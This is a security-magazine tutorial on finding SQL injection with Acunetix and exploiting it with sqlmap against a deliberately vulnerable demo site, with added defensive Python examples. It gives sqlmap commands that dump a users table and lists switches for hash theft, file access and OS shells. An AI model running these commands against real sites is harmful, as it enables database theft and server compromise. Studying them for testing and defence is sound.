Channel: Hakin9 – IT Security Magazine

Exploiting SQL injection using acunetix vulnerability scanner and sqlmap


By Adam Karim

SQL injection (SQLi)

SQLi is the best-known of all web application flaws, and most web application security professionals have some familiarity with it: an attacker supplies crafted input that alters the application's SQL statements, bypasses the application's security controls and gains access to the database.

How Does a SQL Injection Attack Work?

SQL injection is the most dangerous security risk for web applications. Attacks usually result in data being deleted or destroyed and can lead to the entire web server being compromised.


Before we can find SQL injection vulnerabilities, we must first identify the locations where data can be found and passed into a database.

Authentication is usually backed by the database; what else depends on the database varies with the nature of the web application, but features such as web forms, messaging and e-commerce functions often require interaction with the database as well.

Identifying SQL injection vulnerabilities

We can identify SQL injection vulnerabilities by submitting a single quote ('), which SQL uses as a string delimiter, as a simple check. If the application does not handle this character correctly, it causes a database error, which indicates that a SQL injection vulnerability exists, as shown in the figure below.

testphp.vulnweb.com/listproducts.php?cat=1'


This error message tells us a few things: we have caused an error in a SQL statement, the database server is MySQL and the server is running on Linux.

How it happens

We usually start by entering a single quote in each field that we suspect passes its value to the database. If we had access to the application's source code, we could inspect it for SQL queries built by string concatenation. In PHP code, such a query looks like this:

$query = "SELECT * FROM users WHERE username = '$user' AND password = '$pass'";

If user-controlled input, such as $user and $pass, is included in an SQL statement without being sanitised in any way, the possibility of SQL injection is very high. Let's analyse this with some examples. During a normal login, a user submits "Adam" and "p@ssword2000" as username and password, so the query sent to the database looks like this:

SELECT * FROM users WHERE username = 'Adam' AND password = 'p@ssword2000';

Notice how the submitted values are enclosed in quotes. Let's see what happens if we send a GET request whose username parameter contains only a single quote:

SELECT * FROM users WHERE username = ''' AND password = 'p@ssword2000';

Since the single quote is the string delimiter, the database reads an empty username followed by a stray quote that opens an unterminated string. The resulting syntax error shows that the single-quote payload reached the query unaltered.
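To make the mechanism concrete, here is an added Python example (not part of the original article) that reproduces the concatenated query above against an in-memory SQLite database: the single-quote probe produces the database error the article describes, while the parameterised form beside it treats the same input as plain data. The users table and its one row are constructed for the example.

```python
import sqlite3


def setup_db():
    """Create an in-memory users table with one constructed sample row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('Adam', 'p@ssword2000')")
    return conn


def build_query_unsafe(user, pw):
    """Mirrors the article's PHP pattern: values pasted straight into the SQL text."""
    return f"SELECT * FROM users WHERE username = '{user}' AND password = '{pw}'"


def login_unsafe(conn, user, pw):
    """Returns (status, detail); status 'error' is the signal the single-quote check looks for."""
    try:
        row = conn.execute(build_query_unsafe(user, pw)).fetchone()
    except sqlite3.Error as exc:  # a stray quote breaks the statement -> syntax error
        return ("error", str(exc))
    return ("ok", row[0]) if row else ("denied", None)


def login_safe(conn, user, pw):
    """Hardened form: placeholders keep user input out of the SQL structure entirely."""
    row = conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?", (user, pw)
    ).fetchone()
    return ("ok", row[0]) if row else ("denied", None)


if __name__ == "__main__":
    db = setup_db()
    print(build_query_unsafe("'", "p@ssword2000"))        # username = ''' ... (broken query)
    print(login_unsafe(db, "'", "p@ssword2000"))          # ('error', '... syntax error ...')
    print(login_safe(db, "'", "p@ssword2000"))            # ('denied', None): quote is just data
```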

Acunetix vulnerability scanner

This scanner automates web vulnerability assessment and management. Once logged in, the Acunetix dashboard shows you the total number of vulnerabilities discovered across your targets, organized according to severity levels high, medium and low.

Scanning a website for vulnerabilities using Acunetix

1. Acunetix vulnerability scanner

We are using a fully licensed version of Acunetix vulnerability scanner - V.14 in our case.

1.1 Configuring the target URL

First, we add the target URL to Acunetix and save it. In our case, the URL is http://testphp.vulnweb.com/

testphp.vulnweb.com is a live website created by Acunetix on which it is legal to practise SQL injection; its database is installed with a default configuration that is vulnerable to SQL injection attacks.

A target is a website, web application or web server to scan for vulnerabilities.


1.2 Scanning target for vulnerabilities

Now, we can configure target options and assign a different level of criticality (Low, Normal, High, Critical).


1.3 Displaying the list of vulnerabilities

When the scan of the target is finished, it is time to review the results. In our case, we found that the target is vulnerable to SQL injection.


1.4 Saving the HTTP request to a file

Now, we save the HTTP request that contains the injection point to the file vuln.txt.


2. Exploiting the website vulnerability with automated SQL injection (sqlmap)

sqlmap is an open source, Python-based, command-line SQL injection tool that can be used to identify and exploit SQL injection vulnerabilities against a wide range of database systems.

2.1 sqlmap: -h and -hh

sqlmap includes two different help switches, -h and -hh, that provide a basic and a more complete syntax guide.

2.2 sqlmap: Define and connect to the target

sqlmap can also be used as the SQLi starting point: from this vantage point, we could use sqlmap to discover SQL injection flaws in the first place. The following switches are useful for letting sqlmap do the discovery:

-u: Target URL.

--crawl: Spiders the site trying to discover entry points for testing.

--forms: Target forms for injection.

--dbms: If we already know or have a good guess about the backend DB, we can inform sqlmap.

2.3 sqlmap: Database Enumeration

Dumping the schema/metadata from the backend is a key step that sqlmap makes significantly easier without us having to bang our heads against syntax needlessly.

--schema: Dump the entire DBMS database, table, and column names.

--dbs/--tables/--columns: These switches can be used to be more tactical than dumping the full list as with --schema.

-D/-T: Can be coupled with the above switches to, for example, list only the tables in the Customer database (-D Customer --tables).

2.4 sqlmap: Database Data Exfiltration

Exfiltrating data is the primary concern for most organisations when considering SQL injection. Now that the metadata has been enumerated, the following switches can exfiltrate data from interesting databases, tables or columns. The --count switch can also prove that data could be exfiltrated without actually stealing it:

--all: Dumps all data and metadata

--count: No data exfiltrated; simply provides a count of records

--dump: Steals data given the applied constraints (e.g., -D Orders -T Customers --dump)

--dump-all: Exfiltrates all table data

--search: Searches DB/table/column names for a string (e.g., user or pass)

2.5 sqlmap key switches: beyond Database Data Exfiltration

The following sqlmap switches dig deeper into the database server itself. They are extremely useful for databases that targets suggest "don't contain anything sensitive."

--users: Enumerate DB user accounts

--passwords: Show DB user account hashes

--file-read: Download files to attack system

--file-write: Upload files to DB system

--reg-read/--reg-write: Read/Write Windows registry keys

--reg-add/--reg-del: Add/Delete Windows registry keys

2.6 sqlmap key switches: Post Exploitation

Without question, the following options are the most talked about sqlmap capabilities. Most organizations, and even security professionals, are unaware of the potential for SQL Injection to yield these sorts of capabilities.

--priv-esc: Escalate privileges of DB

--sql-query/--sql-shell: Run single SQL query or get simulated interactive SQL shell

--os-cmd/--os-shell: Execute single OS command or get simulated interactive OS shell

--os-pwn: Metasploit shell/VNC/Meterpreter

2.7 Using sqlmap to obtain the database management system (DBMS) type and the database name

-r: Load HTTP request from a file

--dbs: fetch database name

python sqlmap.py -r vuln.txt --dbs


Now, we have successfully retrieved the database name “acuart”.

2.8 Extracting tables from the acuart database

Databases consist of multiple tables; let's try to extract all the tables from the "acuart" database.

-D: DBMS database to enumerate

--tables: Enumerate DBMS database tables

python sqlmap.py -r vuln.txt -D acuart --tables


2.9 Finding the columns of the users table

Now we will look at the "users" table inside the "acuart" database and enumerate its columns.

-T: DBMS database table to enumerate (the table name retrieved in the previous step)

--columns: Enumerate DBMS database table columns

python sqlmap.py -r vuln.txt -D acuart -T users --columns


2.10 Getting data from the users table

Usually, the "users" table contains the login credentials of the users.

python sqlmap.py -r vuln.txt -D acuart -T users --dump


In the figure above, we can see that sqlmap has extracted the entire contents of the users table.
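From the defender's side, both the single-quote check from the identification section and the sqlmap run above leave traces in the web server's access log. The following added Python example (not from the article, Acunetix or sqlmap) scans constructed Apache/nginx combined-format log lines for a quote inside a query parameter, for a 5xx response to such a request, and for sqlmap's default User-Agent prefix (sqlmap/...), which it sends unless the operator overrides it; the log lines and the 203.0.113.x address are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Combined log format: ip ident user [time] "METHOD uri PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: a normal request, the single-quote probe (%27) that drew a
# server error, and a request carrying sqlmap's default User-Agent.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2023:10:00:01 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Jan/2023:10:00:02 +0000] "GET /listproducts.php?cat=1%27 HTTP/1.1" 500 812 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Jan/2023:10:00:03 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5123 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
]


def analyse(line):
    """Parse one log line; return its fields plus a list of human-readable findings (None if unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    # parse_qsl percent-decodes values, so %27 becomes a literal single quote.
    for name, value in parse_qsl(urlsplit(m["uri"]).query, keep_blank_values=True):
        if "'" in value:
            findings.append(f"quote probe in parameter {name!r}")
    if m["ua"].lower().startswith("sqlmap"):
        findings.append("sqlmap default User-Agent")
    if findings and m["status"].startswith("5"):
        findings.append("server error returned (possible database error leaked)")
    return {"ip": m["ip"], "uri": m["uri"], "status": int(m["status"]), "findings": findings}


def suspicious(lines):
    """Keep only the parsed lines that produced at least one finding."""
    return [r for r in (analyse(l) for l in lines) if r and r["findings"]]


if __name__ == "__main__":
    for hit in suspicious(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["uri"], "->", "; ".join(hit["findings"]))
```

Only the default User-Agent is caught here; a scan run with a spoofed agent still shows up through the quote probe and the error responses it provokes.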

Conclusion

This article has shown how hackers or penetration testers scan websites to find a vulnerability and exploit it using the Acunetix vulnerability scanner and sqlmap. SQL injection is considered the most dangerous attack in web hacking, and it was counted among the top 10 web hacking techniques of 2022.

References:

https://github.com/sqlmapproject/sqlmap/wiki/Usage
https://www.acunetix.com/websitesecurity/sql-injection/
https://www.acunetix.com/support/docs/wvs/configuring-targets/
